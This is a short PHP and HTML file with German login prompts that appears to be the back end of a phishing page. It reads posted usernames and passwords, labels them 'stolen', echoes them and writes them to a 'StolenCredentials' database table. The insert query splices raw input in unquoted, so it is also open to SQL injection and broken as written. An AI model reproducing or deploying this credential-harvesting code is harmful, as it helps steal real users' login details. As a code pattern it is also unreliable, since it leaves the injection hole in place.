<html>
<body style="background-color:white;">

<p>Bitte melden Sie sich mit Ihrem Benutzernamen und Passwort an.</p>
</p>

<?php

$servername = "localhost";
$username = "username";
$password = "password";
$dbname = "myDB";

$stolen_username = $_POST['user'];
$stolen_password = $_POST['pass'];

echo "Stolen Username: " . $stolen_username . ", stolen password: " . $stolen_password;

if(isset($stolen_username) && isset($stolen_password))
{
    echo "Stolen Username: " . $stolen_username . ", stolen password: " . $stolen_password;

    // Create connection
    $conn = new mysqli($servername, $username, $password, $dbname);
    // Check connection
    if ($conn->connect_error) {
        die("Connection failed: " . $conn->connect_error);
    }
    $sql = "INSERT INTO StolenCredentials (username, password)
    VALUES ($stolen_username, $stolen_password)";

    if ($conn->query($sql) === TRUE) {
      echo "New record created successfully";
    } else {
      echo "Error: " . $sql . "<br>" . $conn->error;
    }
    $conn->close();
}
?>

<p>Starte Anmeldung...</p>
</body>
</html>







